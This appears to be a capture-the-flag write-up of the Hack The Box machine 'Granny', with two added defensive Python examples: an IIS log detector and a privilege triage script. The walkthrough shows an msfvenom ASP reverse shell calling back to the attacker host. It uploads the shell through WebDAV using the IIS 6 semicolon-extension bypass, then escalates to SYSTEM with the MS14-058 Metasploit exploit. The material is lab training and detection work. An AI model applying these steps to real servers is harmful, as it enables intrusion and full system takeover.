Hack The Box : Granny
24 July, 2021
Beginning with an nmap scan
# nmap -A -sC -sV -O 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.10.10.15
Host is up (0.50s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Date: Sat, 24 Jul 2021 08:11:46 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
|_ Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (94%), BT embedded (85%)
OS CPE: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp1:professional cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_ce:5.0.1400 cpe:/h:btvision:btvision%2b_box
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (94%), Microsoft Windows Server 2003 SP1 (93%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP2 (93%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP1 (90%), Microsoft Windows 2000 Server SP4 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 398.52 ms 10.10.16.1
2 588.23 ms 10.10.10.15
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.08 seconds
Only an HTTP server is running, on port 80. The WebDAV scan output looks interesting: the server allows the PUT method.
Next I ran gobuster and some paths were revealed, though they didn't contain anything interesting.
# ./gobuster dir -r -w ./wordlists/common.txt -u http://10.10.10.15/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.15/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: ./wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/Images (Status: 200) [Size: 242]
/_private (Status: 200) [Size: 246]
/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195]
/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195]
/_vti_bin/shtml.dll (Status: 200) [Size: 96]
/_vti_bin (Status: 200) [Size: 759]
/_vti_log (Status: 200) [Size: 246]
/aspnet_client (Status: 200) [Size: 369]
/images (Status: 200) [Size: 242]
===============================================================
Finished
===============================================================
From the WebDAV HackTricks page, I learnt the following about pentesting WebDAV:
- A tool called davtest, which can be used to test the upload and execution capabilities of a remote WebDAV server.
- A tool called cadaver, which can be used to perform certain operations on WebDAV servers.
- A vulnerability in IIS 5/6 that can bypass execution restrictions on WebDAV servers.
So I ran davtest first.
# davtest -url http://10.10.10.15/
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: z_fPS8f4
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_z_fPS8f4
********************************************************
Sending test files
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.jhtml
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.pl
PUT asp FAIL
PUT php SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.php
PUT html SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.html
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.jsp
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.txt
PUT cgi FAIL
PUT aspx FAIL
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.cfm
PUT shtml FAIL
********************************************************
Checking for test file execution
EXEC jhtml FAIL
EXEC pl FAIL
EXEC php FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.html
EXEC jsp FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.txt
EXEC cfm FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_z_fPS8f4
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.jhtml
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.pl
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.php
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.html
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.jsp
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.txt
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.cfm
Executes: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.html
Executes: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.txt
Based on that vulnerability, I created an ASP reverse shell, uploaded it as a text file and then moved it to an ASP filename:
dav:/> put reverse.txt
Uploading reverse.txt to `/reverse.txt':
Progress: [=============================>] 100.0% of 38481 bytes succeeded.
dav:/> copy reverse.txt reverse.asp;.txt
Copying `/reverse.txt' to `/reverse.asp%3b.txt': succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: DavTestDir_z_fPS8f4 0 Jul 24 06:42
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_log 0 Apr 12 2017
Coll: _vti_pvt 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: _vti_txt 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
iisstart.htm 1433 Feb 21 2003
pagerror.gif 2806 Feb 21 2003
postinfo.html 2440 Apr 12 2017
reverse.asp;.txt 38481 Jul 24 07:09
reverse.txt 38481 Jul 24 07:09
dav:/> move reverse.txt reverse.asp;.txt
Moving `/reverse.txt' to `/reverse.asp%3b.txt': succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: DavTestDir_z_fPS8f4 0 Jul 24 06:42
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_log 0 Apr 12 2017
Coll: _vti_pvt 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: _vti_txt 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
iisstart.htm 1433 Feb 21 2003
pagerror.gif 2806 Feb 21 2003
postinfo.html 2440 Apr 12 2017
reverse.asp;.txt 38481 Jul 24 07:09
I used msfvenom to create the ASP reverse shell:
# msfvenom -p windows/shell_reverse_tcp -f asp LHOST=10.10.16.174 LPORT=4444 > reverse.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38481 bytes
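Seen from the server side, the whole upload-and-rename sequence above leaves a recognisable trail in the IIS W3C log: WebDAV write methods (PUT, MOVE, COPY, MKCOL) from an unexpected client, davtest's default DavTestDir_/davtest_ names, and a request for a path where a script extension is immediately followed by a semicolon. The following detector is an added example of mine, not code from the writeup or from any of the tools it uses. It runs over constructed log lines that mirror the session above; the `#Fields:` column layout is the IIS 6 default, and the list of script-mapped extensions is an assumption that should be taken from the server's own handler mappings.

```python
"""Detect WebDAV write activity and the IIS 6 ';' extension trick in W3C logs.

Added example (not from the writeup). The log lines below are constructed
to mirror the davtest/cadaver session in the text.
"""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote

# The write-capable methods nmap's http-methods script listed as risky.
WEBDAV_WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

# Extensions IIS 6 hands to a script engine. Assumption: the real list comes
# from the server's own handler mappings, not from this constant.
SCRIPT_EXTENSIONS = (".asp", ".asa", ".cer", ".cdx", ".aspx")

# "/reverse.asp;.txt": a script extension immediately followed by ';'.
SEMICOLON_TRICK = re.compile(
    "(?:" + "|".join(re.escape(e) for e in SCRIPT_EXTENSIONS) + r");", re.IGNORECASE
)


@dataclass
class Finding:
    client: str
    method: str
    uri: str
    reason: str


def parse_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields: directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):          # #Software, #Version, #Date directives
            continue
        if fields is None:
            raise ValueError("request line before any #Fields: directive")
        values = line.split()             # W3C fields contain no spaces ('+' and '-' pad them)
        if len(values) != len(fields):
            continue                      # malformed line: skip rather than mis-map columns
        yield dict(zip(fields, values))


def suspicious_reasons(method, uri):
    """Return the rule names a single request trips (empty list if clean)."""
    reasons = []
    path = unquote(uri)                   # cadaver showed the ';' escaped as %3b
    if method.upper() in WEBDAV_WRITE_METHODS:
        reasons.append("webdav-write")
    if SEMICOLON_TRICK.search(path):
        reasons.append("semicolon-extension")
    if "davtest" in path.lower():         # davtest's default DavTestDir_/davtest_ names
        reasons.append("davtest-artifact")
    return reasons


def detect(text):
    """Run every rule over every request line and collect the findings."""
    findings = []
    for rec in parse_w3c(text):
        method = rec.get("cs-method", "-")
        uri = rec.get("cs-uri-stem", "-")
        for reason in suspicious_reasons(method, uri):
            findings.append(Finding(rec.get("c-ip", "-"), method, uri, reason))
    return findings


def summarize(findings):
    """Count findings per rule, e.g. {'webdav-write': 4, ...}."""
    return dict(Counter(f.reason for f in findings))


# Constructed sample in the IIS 6 default W3C layout (not a real capture).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2021-07-24 06:40:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2021-07-24 06:40:11 10.10.10.15 GET /iisstart.htm - 80 - 10.10.16.174 Mozilla/5.0 200 0 0
2021-07-24 06:42:03 10.10.10.15 MKCOL /DavTestDir_z_fPS8f4 - 80 - 10.10.16.174 - 201 0 0
2021-07-24 06:42:05 10.10.10.15 PUT /DavTestDir_z_fPS8f4/davtest_z_fPS8f4.txt - 80 - 10.10.16.174 - 201 0 0
2021-07-24 07:09:10 10.10.10.15 PUT /reverse.txt - 80 - 10.10.16.174 - 201 0 0
2021-07-24 07:09:20 10.10.10.15 MOVE /reverse.txt - 80 - 10.10.16.174 - 201 0 0
2021-07-24 07:10:02 10.10.10.15 GET /reverse.asp;.txt - 80 - 10.10.16.174 Mozilla/5.0 200 0 0
2021-07-24 07:11:00 10.10.10.15 PROPFIND /_vti_bin - 80 - 10.10.16.174 - 207 0 0
"""

if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for f in hits:
        print(f"{f.client} {f.method:9}{f.uri:45} {f.reason}")
    print(summarize(hits))
```

On the sample the PROPFIND and the plain GET of iisstart.htm pass clean, while the MKCOL/PUT/MOVE sequence and the final request for `/reverse.asp;.txt` are each reported; the semicolon rule works on the URL-decoded path, so an `%3b` in the log trips it too.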
On visiting the path /reverse.asp;.txt, the reverse shell was caught!
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.15] 1036
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
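The `whoami /priv` listing above is the first thing to triage after a web-tier compromise, because it says what the worker-process account can already do without any further exploit: SeImpersonatePrivilege is exactly what token-abuse escalation (the Churrasco step later in this writeup) relies on. Here is an added example of mine, not from the writeup, that parses that output and reports the high-risk entries. The sample is constructed from the listing above, and the risk table is the usual defender triage list, which is an assumption to tune per environment.

```python
"""Triage the privileges a compromised service account holds (`whoami /priv`).

Added example (not from the writeup). The sample output below is constructed
from the listing in the text.
"""

# Privileges that let a process step outside its own security context.
# Assumption: standard triage list; extend or trim it for your environment.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate other logged-on principals (token abuse)",
    "SeAssignPrimaryTokenPrivilege": "start processes under another account's token",
    "SeDebugPrivilege": "open and inject into any process",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of objects",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
}


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output.

    The table body starts after the '==== ==== ====' ruler. Privilege names
    contain no spaces and the state is always the last token, so the
    free-text description column in between can be ignored.
    """
    privs = {}
    in_table = False
    for line in text.splitlines():
        stripped = line.strip()
        if not in_table:
            in_table = stripped.startswith("=") and set(stripped) <= {"=", " "}
            continue
        if not stripped:
            continue
        tokens = stripped.split()
        privs[tokens[0]] = tokens[-1]
    return privs


def triage(privs):
    """Return sorted (privilege, state, why) tuples for every high-risk entry.

    Disabled entries are still reported: a privilege present in the token can
    be re-enabled by the process itself, so only its absence lowers the risk.
    """
    return sorted((name, state, HIGH_RISK[name]) for name, state in privs.items() if name in HIGH_RISK)


def enabled_high_risk(privs):
    """Names of high-risk privileges that are already enabled."""
    return [name for name, state, _ in triage(privs) if state == "Enabled"]


# Constructed from the listing above (IIS 6 worker process as NETWORK SERVICE).
SAMPLE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

if __name__ == "__main__":
    privs = parse_whoami_priv(SAMPLE)
    for name, state, why in triage(privs):
        print(f"{name:30} {state:9} {why}")
    print("enabled high-risk:", enabled_high_risk(privs))
```

Run against the sample it reports SeAssignPrimaryTokenPrivilege (disabled) and SeImpersonatePrivilege (enabled); on IIS 6 these are part of the NETWORK SERVICE identity by design, so the finding is a prompt to patch and to keep the worker process from being compromised in the first place, not something an application-pool setting removes.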
I couldn't access the user or the administrator directories.
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 10:19 PM <DIR> .
04/12/2017 10:19 PM <DIR> ..
04/12/2017 09:48 PM <DIR> Administrator
04/12/2017 05:03 PM <DIR> All Users
04/12/2017 10:19 PM <DIR> Lakis
0 File(s) 0 bytes
5 Dir(s) 18,123,759,616 bytes free
C:\Documents and Settings>cd Lakis
cd Lakis
Access is denied.
C:\Documents and Settings>cd Administrator
cd Administrator
Access is denied.
One thing I found: the transferred files were landing in "C:\Inetpub\wwwroot", the default directory from which IIS serves web content (https://stackify.com/what-is-inetpub/).
I looked for exploits using windows-exploit-suggester:
# python2 windows-exploit-suggester2.7.py --database 2021-07-22-mssb.xls --systeminfo systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*] http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*] http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*] http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done
With Metasploit
After trying out a lot of the exploits, none of them seemed to work, so I decided to use Metasploit with a different exploit that I found after searching on the internet.
msf6 exploit(windows/local/ms14_058_track_popup_menu) > exploit
[*] Started reverse TCP handler on 10.10.16.174:4443
[*] Launching notepad to host the exploit...
[+] Process 3152 launched.
[*] Reflectively injecting the exploit DLL into 3152...
[*] Injecting exploit into 3152...
[*] Exploit injected. Injecting payload into 3152...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.16.174:4443 -> 10.10.10.15:1042) at 2021-07-24 08:20:23 -0400
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd "C:\Documents and Settings"
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-04-12 10:12:15 -0400 Administrator
40777/rwxrwxrwx 0 dir 2017-04-12 09:42:38 -0400 All Users
40777/rwxrwxrwx 0 dir 2017-04-12 09:42:38 -0400 Default User
40777/rwxrwxrwx 0 dir 2017-04-12 15:19:46 -0400 Lakis
40777/rwxrwxrwx 0 dir 2017-04-12 10:08:32 -0400 LocalService
40777/rwxrwxrwx 0 dir 2017-04-12 10:08:31 -0400 NetworkService
meterpreter > cat Lakis/Desktop/user.txt
<flag>
meterpreter > cat Administrator/Desktop/root.txt
<flag>
Without Metasploit
The same exploit has an executable as well, which means it can be used without Metasploit too: https://github.com/Re4son/Churrasco
Transfer it to the machine and run it with a reverse shell exe (created using msfvenom) as the argument.
C:\Inetpub\wwwroot>churrasco.exe "whoami"
churrasco.exe "whoami"
nt authority\system